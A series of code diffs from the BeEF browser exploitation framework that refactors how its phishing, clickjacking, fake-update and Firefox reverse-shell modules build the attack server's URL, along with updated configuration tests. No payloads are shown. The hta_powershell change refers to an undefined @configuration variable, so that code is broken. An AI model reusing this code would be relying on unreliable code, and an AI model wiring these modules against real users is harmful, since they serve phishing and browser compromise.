-    @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    hook_uri = "#{proto}://#{beef_host}:#{beef_port}/demos/plain.html"
+    configuration = BeEF::Core::Configuration.instance
+    hook_uri = "#{configuration.beef_url_str}/demos/plain.html"
 
     return [
       {'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },

--- a/modules/ipec/dns_tunnel/module.rb
+++ b/modules/ipec/dns_tunnel/module.rb
@@ -7,7 +7,7 @@ class Dns_tunnel < BeEF::Core::Command
   
   def self.options
 	@configuration = BeEF::Core::Configuration.instance
-	beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+	beef_host = @configuration.beef_host
 
     return [
         {'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },

--- a/modules/network/nat_pinning_irc/module.rb
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -11,7 +11,7 @@ class Irc_nat_pinning < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
 
     return [
         {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},

--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -11,10 +11,10 @@ class Phonegap_persistence < BeEF::Core::Command
   def self.options
 
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    hook_file = @configuration.get("beef.http.hook_file")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
+    hook_file = @configuration.hook_file_path
 
     return [{
       'name' => 'hook_url',

--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -8,9 +8,9 @@ class Clickjacking < BeEF::Core::Command
 
 	def self.options
     		@configuration = BeEF::Core::Configuration.instance
-    		proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    		beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    		beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    		proto = @configuration.beef_proto
+    		beef_host = @configuration.beef_host
+    		beef_port = @configuration.beef_port
     		base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
 		uri = "#{base_host}/demos/clickjacking/clickjack_victim.html"

--- a/modules/social_engineering/clippy/module.rb
+++ b/modules/social_engineering/clippy/module.rb
@@ -14,9 +14,9 @@ class Clippy < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -13,9 +13,9 @@ class Fake_flash_update < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     
     image = "#{base_host}/adobe/flash_update.png"

--- a/modules/social_engineering/fake_notification_c/module.rb
+++ b/modules/social_engineering/fake_notification_c/module.rb
@@ -7,9 +7,9 @@ class Fake_notification_c < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

--- a/modules/social_engineering/fake_notification_ff/module.rb
+++ b/modules/social_engineering/fake_notification_ff/module.rb
@@ -7,9 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    proto = @configuration.beef_proto
     beef_host = @configuration.get("beef.http.public")      || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    beef_port = @configuration.beef_port
     url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
     return [
       {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},

--- a/modules/social_engineering/fake_notification_ie/module.rb
+++ b/modules/social_engineering/fake_notification_ie/module.rb
@@ -7,9 +7,9 @@ class Fake_notification_ie < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

--- a/modules/social_engineering/firefox_extension_bindshell/module.rb
+++ b/modules/social_engineering/firefox_extension_bindshell/module.rb
@@ -72,7 +72,7 @@ class Firefox_extension_bindshell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
         {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

--- a/modules/social_engineering/firefox_extension_dropper/module.rb
+++ b/modules/social_engineering/firefox_extension_dropper/module.rb
@@ -82,9 +82,9 @@ class Firefox_extension_dropper < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},

--- a/modules/social_engineering/firefox_extension_reverse_shell/module.rb
+++ b/modules/social_engineering/firefox_extension_reverse_shell/module.rb
@@ -75,7 +75,7 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
         {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

--- a/modules/social_engineering/gmail_phishing/module.rb
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -7,9 +7,9 @@ class Gmail_phishing < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
      xss_hook_url = "#{base_host}/demos/basic.html"

--- a/modules/social_engineering/hta_powershell/module.rb
+++ b/modules/social_engineering/hta_powershell/module.rb
@@ -4,25 +4,17 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Hta_powershell < BeEF::Core::Command
-
   def self.options
+    @config = BeEF::Core::Configuration.instance
+    ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
 
-    @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    base_host = "#{proto}://#{beef_host}:#{beef_port}"
-
-    ps_url = @configuration.get('beef.extension.social_engineering.powershell.powershell_handler_url')
-
-    return [
-        {'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "#{base_host}" },
-        {'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => "#{ps_url}"}
+    [
+      { 'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => @configuration.beef_url_str },
+      { 'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => ps_url }
     ]
   end
 
   def post_execute
-    save({'result' => @datastore['result']})
+    save({ 'result' => @datastore['result'] })
   end
-
 end

--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -7,9 +7,9 @@ class Pretty_theft < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     logo_uri = "#{base_host}/ui/media/images/beef.png"
     return [

--- a/modules/social_engineering/replace_video_fake_plugin/module.rb
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -7,9 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
-    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+    proto = configuration.beef_proto
+    beef_host = configuration.beef_host
+    beef_port = configuration.beef_port
     url = "#{proto}://#{beef_host}:#{beef_port}"
     return [
         {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},

--- a/spec/beef/core/main/command_spec.rb
+++ b/spec/beef/core/main/command_spec.rb
@@ -1,0 +1,10 @@
+RSpec.describe 'BeEF Command class testing' do
+  it 'should return a beef configuration variable' do
+    BeEF::Modules.load
+    command_mock = BeEF::Core::Command.new('test_get_variable')
+    expect(command_mock.config.beef_host).to eq('0.0.0.0')
+    require 'modules/browser/hooked_domain/get_page_links/module'
+    gpl = Get_page_links.new('test_get_variable')
+    expect(gpl.config.beef_host).to eq('0.0.0.0')
+  end
+end

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -13,8 +13,15 @@ end
 RSpec.describe 'BeEF Configuration' do
   context 'configuration validation', :type => :old do
     it 'should error when using hold public config' do
+      @config_instance.set('beef.http.public', 'example.com')
       expect(@config_instance.validate).to eq(nil)
     end
+
+    it 'should error when using old public_port config' do
+      @config_instance.set('beef.http.public_port', 443)
+      expect(@config_instance.validate).to eq(nil)
+    end
+
   end
 
   context 'http local host configuration values' do

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -62,23 +62,23 @@ RSpec.describe 'BeEF Configuration' do
 
   context 'beef https enabled configuration values' do
     it 'should set the https enabled config value' do
-      @config_instance.set('beef.http.https.enabled', true)
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      @config_instance.set('beef.http.https.enable', true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
     end
 
     it 'should get https enabled value set to true' do
-      @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.https.enable', true)
       expect(@config_instance.local_https_enabled).to eq(true)
     end
 
     it 'should get https enabled value set to false' do
-      @config_instance.set('beef.http.https.enabled', false)
+      @config_instance.set('beef.http.https.enable', false)
       expect(@config_instance.local_https_enabled).to eq(false)
     end
 
     it 'should get the default https enabled value' do
-      @config_instance.set('beef.http.https.enabled', nil)
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(nil)
+      @config_instance.set('beef.http.https.enable', nil)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(nil)
       expect(@config_instance.local_https_enabled).to eq(false)
     end
   end
@@ -125,8 +125,8 @@ RSpec.describe 'BeEF Configuration' do
 
   context 'beef https enabled configuration values' do
     it 'should set the https enabled config value' do
-      @config_instance.set('beef.http.https.enabled', true)
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      @config_instance.set('beef.http.https.enable', true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
     end
 
     it 'should get https enabled value set to true' do
@@ -203,7 +203,7 @@ RSpec.describe 'BeEF Configuration' do
 
     it 'should return a protocol http if public is not set and https local is fales'  do
       @config_instance.set('beef.http.public.https', false)
-      @config_instance.set('beef.http.https.enabled', false)
+      @config_instance.set('beef.http.https.enable', false)
       expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_proto).to eq('http')
     end
@@ -211,13 +211,13 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return the full url string for beef local http and port 80' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', '80')
-      @config_instance.set('beef.http.https.enabled', false)
+      @config_instance.set('beef.http.https.enable', false)
       @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq('80')
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(false)
       expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_url_str).to eq('http://localhost:80')
     end
@@ -225,14 +225,14 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return the full url string for beef https localhost 3000 default' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', nil)
-      @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.https.enable', true)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
       expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
     end
@@ -240,14 +240,14 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return the full url string for beef hook url' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', nil)
-      @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.https.enable', true)
       @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beeg.http.hook_file', '/hook.js')
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
-      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.https.enable')).to eq(true)
       expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
       expect(@config_instance.beef_url_str).to eq('https://localhost:3000')

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -1,8 +1,22 @@
-RSpec.describe 'BeEF Configuration' do
-  before(:all) do
-    @config_instance = BeEF::Core::Configuration.instance
+RSpec.configure do |config|
+  config.before(:context, :type => :old ) do
+    config = File.expand_path('../../../support/assets/config_old.yaml', __dir__)
+    @config_instance = BeEF::Core::Configuration.new(config)
   end
   
+  config.before(:context) do
+    config = File.expand_path('../../../support/assets/config_new.yaml', __dir__)
+    @config_instance = BeEF::Core::Configuration.new(config)
+  end
+end
+
+RSpec.describe 'BeEF Configuration' do
+  context 'configuration validation', :type => :old do
+    it 'should error when using hold public config' do
+      expect(@config_instance.validate).to eq(nil)
+    end
+  end
+
   context 'http local host configuration values' do
     it 'should set the local host value to 0.0.0.0' do
       @config_instance.set('beef.http.host', '0.0.0.0')
@@ -65,18 +79,18 @@ RSpec.describe 'BeEF Configuration' do
   #public
   context 'http public host configuration values' do
     it 'should set the public host value to example.com' do
-      @config_instance.set('beef.http.public', 'example.com')
-      expect(@config_instance.get('beef.http.public')).to eq('example.com')
+      @config_instance.set('beef.http.public.host', 'example.com')
+      expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
     end
 
     it 'should get the public host value' do
-      @config_instance.set('beef.http.public', 'example.com')
+      @config_instance.set('beef.http.public.host', 'example.com')
       expect(@config_instance.public_host).to eq('example.com')
     end
 
     it 'should get nil host value' do
-      @config_instance.set('beef.http.public', nil)
-      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      @config_instance.set('beef.http.public.host', nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.public_host).to eq(nil)
     end
   end
@@ -94,10 +108,10 @@ RSpec.describe 'BeEF Configuration' do
 
     it 'should return 80 as the port given a public host has been set and https disabled' do
       @config_instance.set('beef.http.public_port', nil)
-      @config_instance.set('beef.http.public', 'example.com')
+      @config_instance.set('beef.http.public.host', 'example.com')
       @config_instance.set('beef.http.https.public_enabled', false)
       expect(@config_instance.get('beef.http.public_port')).to eq(nil)
-      expect(@config_instance.get('beef.http.public')).to eq('example.com')
+      expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
       expect(@config_instance.public_port).to eq('80')
     end
   end
@@ -137,28 +151,28 @@ RSpec.describe 'BeEF Configuration' do
   context 'beef hosting information' do
     it 'should return the local host value because a public has not been set' do
       @config_instance.set('beef.http.host', 'asdqwe')
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
-      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.beef_host).to eq('asdqwe')
     end
 
     it 'should return the public host value because a public has been set' do
       @config_instance.set('beef.http.host', 'asdqwe')
-      @config_instance.set('beef.http.public', 'poilkj')
+      @config_instance.set('beef.http.public.host', 'poilkj')
       expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
-      expect(@config_instance.get('beef.http.public')).to eq('poilkj')
+      expect(@config_instance.get('beef.http.public.host')).to eq('poilkj')
       expect(@config_instance.beef_host).to eq('poilkj')
     end
 
     it 'should return the local port value because a public value has not been set' do
       @config_instance.set('beef.http.port', '3000')
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public_port', nil)
       @config_instance.set('beef.http.https.public_enabled', nil)
       expect(@config_instance.get('beef.http.port')).to eq('3000')
       expect(@config_instance.get('beef.http.public_port')).to eq(nil)
-      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
       expect(@config_instance.beef_port).to eq('3000')
     end
@@ -166,16 +180,16 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return the public host value because a public has been set' do
       @config_instance.set('beef.http.port', '3000')
       @config_instance.set('beef.http.public_port', '80')
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       expect(@config_instance.get('beef.http.port')).to eq('3000')
       expect(@config_instance.get('beef.http.public_port')).to eq('80')
-      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.beef_port).to eq('80')
     end
     
     it 'should return a protocol https if https public has been enabled and public host is set' do
       @config_instance.set('beef.http.https.public_enabled', true)
-      @config_instance.set('beef.http.public', 'public')
+      @config_instance.set('beef.http.public.host', 'public')
       expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
       expect(@config_instance.beef_proto).to eq('https')
     end
@@ -192,7 +206,7 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.port', '80')
       @config_instance.set('beef.http.https.enabled', false)
       @config_instance.set('beef.http.https.public_enabled', false)
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public_port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq('80')
@@ -205,8 +219,9 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', nil)
       @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.https.public_enabled', false)
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public_port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
@@ -220,7 +235,7 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.port', nil)
       @config_instance.set('beef.http.https.enabled', true)
       @config_instance.set('beef.http.https.public_enabled', false)
-      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public_port', nil)
       @config_instance.set('beeg.http.hook_file', '/hook.js')
       expect(@config_instance.get('beef.http.host')).to eq('localhost')

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -97,20 +97,20 @@ RSpec.describe 'BeEF Configuration' do
 
   context 'http public port configuration values' do
     it 'should set the public port value to 3000' do
-      @config_instance.set('beef.http.public_port', '443')
-      expect(@config_instance.get('beef.http.public_port')).to eq('443')
+      @config_instance.set('beef.http.public.port', '443')
+      expect(@config_instance.get('beef.http.public.port')).to eq('443')
     end
 
     it 'should get the public port value' do
-      @config_instance.set('beef.http.public_port', '3000')
+      @config_instance.set('beef.http.public.port', '3000')
       expect(@config_instance.public_port).to eq('3000')
     end
 
     it 'should return 80 as the port given a public host has been set and https disabled' do
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beef.http.public.host', 'example.com')
       @config_instance.set('beef.http.https.public_enabled', false)
-      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
       expect(@config_instance.public_port).to eq('80')
     end
@@ -140,9 +140,9 @@ RSpec.describe 'BeEF Configuration' do
 
     it 'should return public port as 443 if public https is enabled' do
       @config_instance.set('beef.http.https.public_enabled', true)
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
-      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.public_https_enabled?).to eq(true)
       expect(@config_instance.public_port).to eq('443')
     end
@@ -168,10 +168,10 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return the local port value because a public value has not been set' do
       @config_instance.set('beef.http.port', '3000')
       @config_instance.set('beef.http.public.host', nil)
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beef.http.https.public_enabled', nil)
       expect(@config_instance.get('beef.http.port')).to eq('3000')
-      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
       expect(@config_instance.beef_port).to eq('3000')
@@ -179,10 +179,10 @@ RSpec.describe 'BeEF Configuration' do
 
     it 'should return the public host value because a public has been set' do
       @config_instance.set('beef.http.port', '3000')
-      @config_instance.set('beef.http.public_port', '80')
+      @config_instance.set('beef.http.public.port', '80')
       @config_instance.set('beef.http.public.host', nil)
       expect(@config_instance.get('beef.http.port')).to eq('3000')
-      expect(@config_instance.get('beef.http.public_port')).to eq('80')
+      expect(@config_instance.get('beef.http.public.port')).to eq('80')
       expect(@config_instance.get('beef.http.public.host')).to eq(nil)
       expect(@config_instance.beef_port).to eq('80')
     end
@@ -207,7 +207,7 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.https.enabled', false)
       @config_instance.set('beef.http.https.public_enabled', false)
       @config_instance.set('beef.http.public.host', nil)
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq('80')
       expect(@config_instance.get('beef.http.https.enabled')).to eq(false)
@@ -222,7 +222,7 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.https.public_enabled', false)
       @config_instance.set('beef.http.public.host', nil)
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
       expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
@@ -236,7 +236,7 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.https.enabled', true)
       @config_instance.set('beef.http.https.public_enabled', false)
       @config_instance.set('beef.http.public.host', nil)
-      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beeg.http.hook_file', '/hook.js')
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -116,7 +116,7 @@ RSpec.describe 'BeEF Configuration' do
     it 'should return 80 as the port given a public host has been set and https disabled' do
       @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beef.http.public.host', 'example.com')
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
       expect(@config_instance.public_port).to eq('80')
@@ -130,25 +130,25 @@ RSpec.describe 'BeEF Configuration' do
     end
 
     it 'should get https enabled value set to true' do
-      @config_instance.set('beef.http.https.public_enabled', true)
+      @config_instance.set('beef.http.public.https', true)
       expect(@config_instance.public_https_enabled?).to eq(true)
     end
 
     it 'should get https enabled value set to false' do
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       expect(@config_instance.public_https_enabled?).to eq(false)
     end
 
     it 'should get the default https to false' do
-      @config_instance.set('beef.http.https.public_enabled', nil)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
+      @config_instance.set('beef.http.public.https', nil)
+      expect(@config_instance.get('beef.http.public.https')).to eq(nil)
       expect(@config_instance.public_https_enabled?).to eq(false)
     end
 
     it 'should return public port as 443 if public https is enabled' do
-      @config_instance.set('beef.http.https.public_enabled', true)
+      @config_instance.set('beef.http.public.https', true)
       @config_instance.set('beef.http.public.port', nil)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.public.https')).to eq(true)
       expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.public_https_enabled?).to eq(true)
       expect(@config_instance.public_port).to eq('443')
@@ -176,11 +176,11 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.port', '3000')
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
-      @config_instance.set('beef.http.https.public_enabled', nil)
+      @config_instance.set('beef.http.public.https', nil)
       expect(@config_instance.get('beef.http.port')).to eq('3000')
       expect(@config_instance.get('beef.http.public.port')).to eq(nil)
       expect(@config_instance.get('beef.http.public.host')).to eq(nil)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
